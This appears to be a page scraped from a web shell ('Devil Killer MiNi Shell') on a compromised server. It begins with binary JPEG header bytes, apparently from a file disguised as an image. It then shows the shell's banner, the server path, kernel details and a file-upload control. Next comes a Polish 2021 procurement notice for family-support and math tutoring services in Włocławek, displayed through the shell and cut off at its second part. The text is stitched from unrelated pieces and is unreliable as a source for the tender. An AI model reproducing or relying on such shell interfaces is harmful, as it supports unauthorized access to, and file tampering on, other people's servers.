JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210625/0009488501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00094885 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi wsparcia rodziny i pieczy zastępczej, realizowane w ramach projektu partnerskiego „Rodzina w Centrum 3" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Włocławek - Miejski Ośrodek Pomocy Rodzinie we Włocławku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005871024</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ogniowa 8/10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">54 423 23 26</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@mopr.wloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.mopr.wloclawek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi wsparcia rodziny i pieczy zastępczej, realizowane w ramach projektu partnerskiego „Rodzina w Centrum 3" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63d5980e-d57e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00094885</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00075871/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi wsparcia rodziny i pieczy zastępczej, polegające na prowadzeniu: zajęć wyrównujących braki szkolne w zakresie matematyki, zajęć pt. ”Mały odkrywca”, w ramach projektu „Rodzina w Centrum 3”.</p> <p class="mb-0">1.3.2 Wsparcie rodziny i pieczy zastępczej : zajęcia socjoterapeutyczne oraz warsztaty podnoszące kompetencje społeczne i warsztaty twórczego myślenia, w ramach projektu „Rodzina w Centrum 3”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Rodzina w Centrum 3” , realizowany w ramach Osi Priorytetowej 9 Solidarne społeczeństwo, Działania 9.3 Rozwój usług zdrowotnych i społecznych, Poddziałania 9.3.2 Rozwój usług społecznych w ramach części RPO WKP 2014-2020 współfinansowanej z Europejskiego Funduszu Społecznego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mopr.wloclawek.pl i https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej. Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego<br/>na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID<br/>postępowania). Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany adres email.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">c.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>d. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>e. Ofertę, oświadczenia, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach<br/>.txt, .rtf, .pdf, .doc, .docx, .odti podpisuje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Ofertę, a także oświadczenia w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. f. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i„ do komunikacji” wynosi 150MB.<br/>g. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>h. Zamawiający wskaże link do postępowania oraz ID postępowania na swej stronie internetowej (stronie prowadzonego postepowania). Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>i. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>j. Adres skrzynki ePuap Zamawiającego: MOPRWloclawek/SkrytkaESP<br/>k. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Marzena Lewandowska adres e-mail: zamówienia.publiczne@mopr.wloclawek.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Admin.Pani/Pana danych osobowych (dalej Administrator)<br/>jest MOPR we Włocławku z siedzibą we Włocławku przy ul. Ogniowej 8/10, nr telefonu 54 423-23-00,<br/>adres e-mail: sekretariat@mopr.wloclawek.pl., w imieniu którego działa Dyrektor MOPRe we<br/>Włocławku.<br/>2. Admin. wyznaczył Inspektora Ochrony Danych Osobowych (IOD), z którym można się skontaktować<br/>pod adresem MOPR we Włocławku, ul. Ogniowa 8/10, 87-800 Włocławek, mailowo:<br/>iod@mopr.wloclawek.pl Z inspektorem ochrony danych można się kontaktować we wszystkich<br/>sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z<br/>przetwarzaniem danych.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, powyżej progu<br/>stosowania ustawy Pzp, zgodnie z art. 2 ust. 1 pkt 1 ustawy Pzp (Dz.U. z 2019, poz. 2019 ze zm.) oraz<br/>zgodnie z art. 5-6 ustawy z 14 lipca 1983r. o narodowym zasobie archiwalnym i archiwach. (Dz.U. z<br/>2020 r. poz. 164 ze zm.).<br/>4. Pani/Pana dane osobowe będą przechowywane, przez okres 5 lat, licząc od pierwszego stycznia roku następującego po roku, w którym zakończyło się postępowanie o udzielenie zamówienia, zgodnie<br/>z Instrukcja kancelaryjną Miejskiego Ośrodka Pomocy Rodzinie we Włocławku, wprowadzoną<br/>zarządzeniem nr 8/2014 Dyrektora MOPR we Włocławku z dnia 18 marca 2014r. Okres wskazany<br/>powyżej może zostać przedłużony do czasu, upływu okresu przedawnienia ewentualnych roszczeń,<br/>jeśli przetwarzanie danych osobowych będzie niezbędne do dochodzenia lub obrony przed takimi<br/>roszczeniami lub jeżeli przetwarzanie jest niezbędne na podstawie innych przepisów.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o ustawę o dostępie do informacji publicznej z dnia 6 września<br/>2001r. (Dz.U. z 2020 r. poz. 2176).<br/>6. Przekazywanie danych do państwa trzeciego<br/>Administrator nie przewiduje przekazywać danych osobowych do państw trzecich.<br/>7. Prawa związane z przetwarzaniem danych osobowych i podejmowaniem zautomatyzowanych<br/>decyzji<br/>Przysługują Pani/Panu następujące prawa związane z przetwarzaniem danych osobowych:<br/>1) prawo dostępu do Pani/Pana danych osobowych;<br/>2) prawo żądania sprostowania Pani/Pana danych osobowych zgodnie z art. 16 RODO, jednak<br/>skorzystanie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy.<br/>3) prawo żądania usunięcia Pani/Pana danych osobowych, w sytuacji, gdy przetwarzanie danych nie<br/>następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach<br/>sprawowania władzy publicznej;<br/>4) prawo żądania ograniczenia przetwarzania Pani/Pana danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO. Zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania<br/>Aby skorzystać z powyższych praw, należy skontaktować się z Administratorem lub z naszym<br/>inspektorem ochrony danych.<br/>8. Prawo wniesienia skargi do organu<br/>Przysługuje Pani/Panu także prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną<br/>danych osobowych, tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>9. Wymóg podania danych<br/>Podanie przez Panią/Pana danych osobowych jest obowiązkowe, w sytuacji gdy przesłankę<br/>przetwarzania danych osobowych stanowi przepis prawa. Niepodanie danych osobowych w zakresie<br/>wymaganym przepisami spowoduje pozostawienie sprawy bez rozpoznania. Jeżeli przesłanką<br/>przetwarzania danych będzie umowa, podanie danych osobowych jest niezbędne do jej zawarcia.<br/>Niepodanie danych spowoduje, że umowa nie będzie mogła być zawarta.<br/>10. Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane, tj. dane<br/>osobowe konkretnej osoby nie będą analizowane w taki sposób, aby stworzyć dokładny opis jej<br/>preferencji i cech. (art. 22 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPR.AO.A.261.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 396000 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 264000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zajęcia wyrównujące braki szkolne z matematyki w Świetlicach środowiskowych „Zachęta” i<br/>‘”Zacisze”, prowadzonych przez Miejski Ośrodek Pomocy Rodzinie we Włocławku.<br/>a. zajęcia przeznaczone dla dzieci i młodzieży w wieku od 6 do 16 lat, realizowane w celu<br/>podniesienie umiejętności matematycznych, nadrobienie zaległości, pomoc w odrabianiu lekcji z<br/>matematyki, przygotowanie do testów/sprawdzianów.<br/>b. termin świadczenia usług: od dnia podpisania umowy do dnia 29 grudnia 2022r. -<br/>szczegółowy harmonogram świadczenia usług zostanie ustalony przed podpisaniem umowy z<br/>wykonawcą, usługi świadczone będą zgodnie z zapotrzebowaniem odbiorców wsparcia, w dni<br/>robocze.<br/>c. zajęcia wyrównujące braki szkolne z matematyki<br/>w Świetlicy środowiskowej „Zachęta” MOPR Włocławek:<br/>- Liczba godzin w 2021r. – 240 godzin.<br/>- Liczba godzin w 2022r.- 200 godzin.<br/>d. zajęcia wyrównujące braki szkolne z matematyki<br/>w Świetlicy środowiskowej „Zacisze” MOPR Włocławek:<br/>- Liczba godzin w 2021r. – 240 godzin.<br/>- Liczba godzin w 2022r.- 200 godzin.<br/>e. odbiorcy zajęć: dzieci i młodzież w wieku od 6 do 16 lat uczęszczające do świetlicy<br/>środowiskowej.<br/>f. zajęcia indywidualne lub grupowe- w zależności od potrzeb uczestników, ogólna liczba osób w<br/>obu świetlicach objętych zajęciami min. 30 osób;<br/>g. miejsce świadczenia usługi (wariant I):<br/>- Świetlica Środowiskowa „Zachęta” ul. Wieniecka 42,<br/>87-800 Włocławek<br/>- Świetlica Środowiskowa „Zacisze” ul. Zakręt 8,<br/>87-800 Włocławek<br/>h. w razie potrzeby zajęcia mogą odbywać się w innym miejscu, niż wymienione w pkt g,<br/>wskazanym przez zamawiającego.<br/>i. Zamawiający przewiduje możliwość przeprowadzenie zajęć w formie zdalnej (wariant II) za<br/>pośrednictwem ogólnodostępnych komunikatorów np. Skype, Messenger, Whatsapp, Zoom, w<br/>sytuacji wynikającej z działania siły wyższej, tj. zdarzeń losowych takich jak: pożar, powódź, atak<br/>terrorystyczny, klęski żywiołowe, pandemie, epidemie.<br/>j. tematyka zajęć: według potrzeb uczestnika, zgodna z programem nauczania obowiązującym<br/>na różnych etapach edukacji, obejmująca w szczególności:<br/>- pomoc w nadrobieniu zaległości w programie nauczania,<br/>- przygotowanie do sprawdzianów, egzaminów,<br/>k. wymagane metody dydaktyczne:<br/>- metody słowne;<br/>- metody gier dydaktycznych,<br/>l. wykonawca zapewni niezbędne narzędzia i sprzęt do prawidłowej realizacji usług w ramach<br/>przedmiotu zamówienia, m.in.. pomoce dydaktyczne w formie papierowej - testy, ćwiczenia,<br/>zadania, podręczniki.<br/>m. w przypadku realizacji zajęć w formie zdalnej Wykonawca nie zapewnia sprzętu uczestnikom<br/>zajęć; n. z każdego dnia zajęć wykonawca zobowiązany jest sporządzać listę obecności uczestników<br/>oraz sprawozdanie miesięczne wg wzoru określonego przez Zamawiającego; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80310000-0 - Usługi edukacji młodzieży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">- zajęcia wyrównujące braki szkolne z matematyki w Świetlicy środowiskowej „Zachęta”<br/>MOPR Włocławek – 220 godzin,<br/>- zajęcia wyrównujące braki szkolne z matematyki w Świetlicy środowiskowej „Zacisze” MOPR<br/>Włocławek - 220 godzin,<br/>- charakterystyka zajęć zgodna z opisem przedmiotu zamówienia w rozdziale V pkt 5 SIWZ,<br/>- warunki realizacji zgodnie z postanowieniami projektu umowy załączonego do niniejszej SIWZ</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>1) CZĘŚĆ I : „Całkowita cena oferty brutto” – C = (C1 + C2)/2<br/>Gdzie:<br/>C – całkowita cena oferty brutto<br/>C1 – cena oferty za wariant I zamówienia, czyli za zajęcia w formie stacjonarnej<br/>C2 – cena oferty za wariant II zamówienia, czy za zajęcia w formie zdalnej<br/>Cena najtańszej oferty<br/>C = ------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/>2) Doświadczenie osoby prowadzącej zajęcia” – D;<br/>0-3 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie matematyki<br/>– 0 pkt<br/>Powyżej 3 do 5 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie<br/>matematyki – 10 pkt<br/>Powyżej 5 lat do 7 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w<br/>zakresie matematyki – 20 pkt<br/>Powyżej 7 lat do 9 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w<br/>zakresie matematyki – 30 pkt<br/>Powyżej 9 lat doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie matematyki –<br/>40 pkt<br/>3. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + D<br/>gdzie L to całkowita liczba punktów.<br/>4. Ocena punktowa w kryterium „Całkowita cena oferty brutto” dokonana zostanie na podstawie<br/>całkowitej ceny oferty brutto, wyliczonej jako średnia z sumy ceny za realizację zamówienia w formie stacjonarnej (wariant I) i ceny za realizację zamówienia w formie zdalnej (wariant II), wskazanej przez<br/>Wykonawcę w formularzu ofertowym i przeliczona według wzoru opisanego w tabeli powyżej.<br/>6. Ocena punktowa w kryterium „Doświadczenie osoby prowadzącej zajęcia” dokonana zostanie,<br/>zgodnie z zasadami opisanymi w tabeli powyżej, na podstawie podanych przez Wykonawcę w<br/>formularzu ofertowym informacji, dotyczących doświadczenia osoby wyznaczonej do realizacji<br/>zamówienia.<br/>7. Niewskazanie w formularzu ofertowym żadnej osoby, o której mowa w pkt. 6, spowoduje odrzucenie<br/>oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>8. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do<br/>dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby prowadzącej zajęcia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) 